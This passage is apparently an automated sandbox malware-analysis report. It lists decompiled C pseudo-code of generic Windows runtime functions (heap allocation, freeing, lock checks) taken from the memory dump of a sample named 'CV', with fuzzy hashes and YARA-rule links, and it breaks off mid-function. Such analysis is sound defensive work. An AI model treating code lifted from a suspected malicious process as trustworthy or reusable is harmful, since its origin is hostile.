Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 12cbe87527c764a14d113ac23c007d161f2c9aa55b3d91c8beaf25998cefadc7
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 2EE0E5322515416BEB11AF09CCC0B23775D9FD2724F004078B9001E282C6E5DC4887A0

Uniqueness

Uniqueness Score: -1.00%

Function 0126746D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0126746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0125EB70(__ecx, 0x13379a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E012895D0();
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x0126746d
0x0126746d
0x0126746d
0x01267471
0x01267488
0x012af92d
0x0126748e
0x01267491
0x01267495
0x012af937
0x012af93a
0x012af94e
0x012af953
0x012af956
0x012af956
0x01267495
0x00000000
0x01267488
0x01267473
0x01267478
0x0126747d
0x01267481
0x00000000
0x01267481
0x0126747d
0x0126747a
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c53ebf3c40ddf0261b3074a717987373dbc221cf48315ada0776791bccc622a
Instruction ID: 209c1e1e84c3128bf99d46390f9d334d100a89904bb05926aaa32e8421c2aeea
Opcode Fuzzy Hash: 0c53ebf3c40ddf0261b3074a717987373dbc221cf48315ada0776791bccc622a
Instruction Fuzzy Hash: F0F02E30930146AACF029B7CE841B79BFB9EF00318F040219DA51AB1E1E3B8D8808785

Uniqueness

Uniqueness Score: -1.00%

Function 01318CD6 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01318CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x133d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E01267D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0128B640(E01289AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01318ce5
0x01318ced
0x01318cf0
0x01318cfb
0x01318d0d
0x01318cfd
0x01318d06
0x01318d06
0x01318d18
0x01318d19
0x01318d1b
0x01318d20
0x01318d33

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f6250bef5917dd8099cc5ce3751dd16bf4adffa21836f2f33b367cb5e6f613a
Instruction ID: 0e20df95161f4f933c3da4135e1997627405653fe1584f19246e13a1b401506c
Opcode Fuzzy Hash: 1f6250bef5917dd8099cc5ce3751dd16bf4adffa21836f2f33b367cb5e6f613a
Instruction Fuzzy Hash: 89F08270A15209AFDB04EBA8E945EBE77B8EF58308F500199E916EB2D0EA34D900C758

Uniqueness

Uniqueness Score: -1.00%

Function 01244F2E Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01244F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E013188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0126C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1221030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x01244f2e
0x01244f34
0x01244f38
0x012a0b85
0x012a0b85
0x012a0b89
0x012a0b9a
0x012a0b9a
0x012a0b9f
0x00000000
0x012a0b9f
0x012a0b94
0x012a0b98
0x00000000
0x00000000
0x00000000
0x012a0b98
0x01244f3e
0x01244f48
0x00000000
0x01244f6e
0x00000000
0x01244f70

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f905f5b11957289135ddf372aee866bb2dd993d9e96af833e9557785f8b5dd9
Instruction ID: 84a3b6787b13e0dec43ced75966229c5b22360862cd007912f119b4de4ef9f93
Opcode Fuzzy Hash: 4f905f5b11957289135ddf372aee866bb2dd993d9e96af833e9557785f8b5dd9
Instruction Fuzzy Hash: AAF0E232D356969FD772DF1CC644F22BBD8EB007B8F854864EA0587922E724EC88C64C

Uniqueness

Uniqueness Score: -1.00%

Function 01318B58 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01318B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x133d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01267D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0128B640(E01289AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01318b67
0x01318b6f
0x01318b72
0x01318b7d
0x01318b8f
0x01318b7f
0x01318b88
0x01318b88
0x01318b9a
0x01318b9b
0x01318b9d
0x01318ba2
0x01318bb5

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3166d8f2e4842ab96995515e9048602e47595d4ed278581251716128995a841
Instruction ID: da1e6ff17f3cf1920264e7caa7b81374547efead72b7321b1aa94b8dffa406ea
Opcode Fuzzy Hash: e3166d8f2e4842ab96995515e9048602e47595d4ed278581251716128995a841
Instruction Fuzzy Hash: E2F082B0A15259AFDB14EBA8D946E7EB7B8FF14308F444499BA05DB3D0EB34D900C798

Uniqueness

Uniqueness Score: -1.00%

Function 0127A44B Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0127A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1337b9c; // 0x0
				_t15 = __ecx;
				_t16 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0128FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0127a44b
0x0127a453
0x0127a472
0x0127a476
0x00000000
0x0127a493
0x0127a47a
0x0127a47f
0x0127a486
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55eb0640137f4a34e7cf2d301f62d0ff28daab0519b94b050eca38baefa8a46
Instruction ID: d14006ea99c9bfe6904ec7a1075cf1982f213beb6c978171ff837956a797a5c1
Opcode Fuzzy Hash: f55eb0640137f4a34e7cf2d301f62d0ff28daab0519b94b050eca38baefa8a46
Instruction Fuzzy Hash: C8E09272A21422ABD3215A18AC40F6BB3ADEBE5661F094035EA04C7254D669DD01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0124F358 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0124F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0127F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01264620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x0124f35d
0x0124f361
0x0124f367
0x0124f372
0x0124f38c
0x0124f38c
0x0124f394

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: f682350f7634ddfb0596de2a40fc3b747a403081bd235913dbbc805a7c06aa06
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 51E0DF32A50158FBDB21ABDD9E05FABBFACDB98A60F000196BA04D7190D5709E40C2D0

Uniqueness

Uniqueness Score: -1.00%

Function 0125FF60 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0125FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x12211a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E013188F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E01260050(_t14);
				}
			}

0x0125ff66
0x0125ff6b
0x00000000
0x0125ff8f
0x00000000
0x0125ff8f

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e6f3e7733b77b0a8bebfcbfdcfb71ab9f37c510c844044e55a464713be88095
Instruction ID: 48f69396ed0a5df00e913b7d57774c9b7b1ac3f1f2700ba6cad565f551a49d36
Opcode Fuzzy Hash: 1e6f3e7733b77b0a8bebfcbfdcfb71ab9f37c510c844044e55a464713be88095
Instruction Fuzzy Hash: DBE0DFB02292069FD77ADB59D3C0F293B9D9B52725F19805DFD084B982C631D880C29A

Uniqueness

Uniqueness Score: -1.00%

Function 012D41E8 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E012D41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x13208f0);
				_t5 = E0129D08C(__ebx, __edi, __esi);
				if( *0x13387ec == 0) {
					E0125EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x13387ec == 0) {
						 *0x13387f0 = 0x13387ec;
						 *0x13387ec = 0x13387ec;
						 *0x13387e8 = 0x13387e4;
						 *0x13387e4 = 0x13387e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L012D4248();
				}
				return E0129D0D1(_t5);
			}

0x012d41e8
0x012d41ea
0x012d41ef
0x012d41fb
0x012d4206
0x012d420b
0x012d4216
0x012d421d
0x012d4222
0x012d422c
0x012d4231
0x012d4231
0x012d4236
0x012d423d
0x012d423d
0x012d4247

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5fd77a735977797ad6167553fba4168d6f85242d9f38097dfd10da9ffff3769
Instruction ID: 5a22132d8645f04189e238ff9f28cde642e6402d8a287ba360da3a0728937435
Opcode Fuzzy Hash: a5fd77a735977797ad6167553fba4168d6f85242d9f38097dfd10da9ffff3769
Instruction Fuzzy Hash: C3F03978870745CFCBB2EFA9D50872436BAFFA4324F40439AE114876A8C77465A4DF09

Uniqueness

Uniqueness Score: -1.00%

Function 012FD380 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012FD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0124E8B0(__ecx, _a4, 0xfff);
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x012fd38a
0x012fd39b
0x012fd3b1
0x00000000
0x012fd3b6
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 128619983de6568323799ea989851a3afae31f5b1772fbcef4ce9ab31820b6e5
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: BEE0C2312A0209BBEB226F84CC00F79BB1AEB507A0F104035FF085A6A0C6799C91DBC4

Uniqueness

Uniqueness Score: -1.00%

Function 0127A185 Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0127A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x13367e4 >= 0xa) {
					if(_t5 < 0x1336800 || _t5 >= 0x1336900) {
						return L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01260010(0x13367e0, _t5);
				}
			}

0x0127a190
0x0127a1a6
0x0127a1c2
0x00000000
0x00000000
0x00000000
0x0127a192
0x0127a192
0x0127a19f
0x0127a19f

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52c7eee9159ddd097ef9dc05fb4182007b8a2024e214950fa89c239e6cad48a5
Instruction ID: ae146fc06b8c5d51832e843d9c0b8e8c7f045e9fea9eba8b9677728c9864e635
Opcode Fuzzy Hash: 52c7eee9159ddd097ef9dc05fb4182007b8a2024e214950fa89c239e6cad48a5
Instruction Fuzzy Hash: D9D0C7A11310003EE62E2310A816B2A361AF7E4768F28084CE2034B9A0EA6889E8921C

Uniqueness

Uniqueness Score: -1.00%

Function 012716E0 Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012716E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E01271710(0x13367e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L01264620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x012716e8
0x012716ef
0x012716f3
0x012716fe
0x00000000
0x01271700
0x0127170d
0x0127170d
0x012716f2
0x012716f2
0x012716f2
0x012716f2

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a4491b35504a0a8e3800e29e13b1a5a7cdda88a66e623cd975256024cccebec
Instruction ID: cf093496f36ffb56d85ed6dbb2abb89721bb6d06e87a7c592e0a7058f104e76c
Opcode Fuzzy Hash: 8a4491b35504a0a8e3800e29e13b1a5a7cdda88a66e623cd975256024cccebec
Instruction Fuzzy Hash: 43D0A771120142AAEA2D5B149854B262659EFD1785F38005CF307494D0CFB0CDB2E04C

Uniqueness

Uniqueness Score: -1.00%

Function 012C53CA Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012C53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0125EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x012c53ca
0x012c53ce
0x012c53d9
0x012c53de
0x012c53e1
0x012c53e1
0x012c53e6
0x012c53f3
0x00000000
0x012c53f8
0x012c53fb

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 1c7d04c7cea71612c95617d5700e279717ec3600e1022709b2604427a8d8477d
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 83E08C31A206819BCF12DF48C690F5EBBF9FB44B00F150048A6085B660C678ED00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 012735A1 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012735A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0125EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x012735a1
0x012735a1
0x012735a5
0x012735ab
0x012735ab
0x012735b5
0x00000000
0x012735c1
0x012735b7

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: de13dbddd34fcd44500129da7d50dfc0efa73f7d9e475a66bf37d7f8341ff53a
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: CFD022B1431182DEEB42EF18E2187FE7BB3FF08208F582069C60206852C33A4A0EF700

Uniqueness

Uniqueness Score: -1.00%

Function 0125AAB0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0125AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x0125aab6
0x0125aabb
0x012aa442
0x00000000
0x012aa448
0x012aa454
0x012aa454
0x0125aac1
0x0125aac1
0x0125aac6
0x0125aac6

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: a0d9e23b0ac2636978aea18737cad769a5edcfb49c7afd3fcafa03d625bec502
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 4BD0C235262A81CFD6568B1DC5A5B1577A4BB44B44FC50590EA018B662E628D944CA10

Uniqueness

Uniqueness Score: -1.00%

Function 012CA537 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012CA537(intOrPtr _a4, intOrPtr _a8) {

				return L01268E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x012ca553

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 4dcafb65d772a94fd61caaa0bc1ae1f6b47c6657e29ad4af47266c2151347918
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: D8C08C33080248BBCB126F81CC00F267F2EFBA4B60F008010FA480B5B0C632E9B0EB84

Uniqueness

Uniqueness Score: -1.00%

Function 0124DB40 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0124DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01264620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x0124db4d
0x0124db54
0x0124db5f
0x0124db56
0x0124db56
0x0124db5c
0x0124db5c

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: dd16f0816d3ebbf725609b8d5a0b9ef7047da6fd3cdf60f142be1a36bdebb0ab
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: F2C08C302A0A42AFEB262F20CD11B113AA4BB21B05F4400A06700DA0F0EB78DC01E600

Uniqueness

Uniqueness Score: -1.00%

Function 0124AD30 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0124AD30(intOrPtr _a4) {

				return L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x0124ad49

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 2e993f87d00cd400e3541068ddf4c638018c050a7b779f98883f3b273f46682c
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 48C02B330D0248BBC7136F45DD00F117F2DE7A0B60F000020F6040B6B1C93AECA0D588

Uniqueness

Uniqueness Score: -1.00%

Function 01263A1C Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01263A1C(intOrPtr _a4) {
				void* _t5;

